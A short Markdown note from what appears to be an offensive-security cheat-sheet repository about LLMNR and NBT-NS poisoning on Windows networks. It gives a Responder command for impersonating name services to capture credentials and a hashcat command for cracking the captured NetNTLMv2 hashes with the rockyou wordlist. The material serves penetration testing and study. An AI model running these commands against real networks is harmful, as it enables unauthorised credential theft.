killchain-compendium/exploit/windows/docs/llmnr.md

21 lines
566 B
Markdown
Raw Normal View History

2022-03-24 00:45:15 +01:00
# Link Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS)
* __LLMNR__, name resolutions inside the local domain for other hosts
* __NBT-NS__, identifying hosts in the network by NetBIOS names
* Impersonating the actual service to get credentials
## Usage
* From [responder](./responder.md)
```sh
sudo responder -I <NIC> -rdw -v
```
* Dictionary attack on catched password
```sh
hashcat -m 5600 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule
```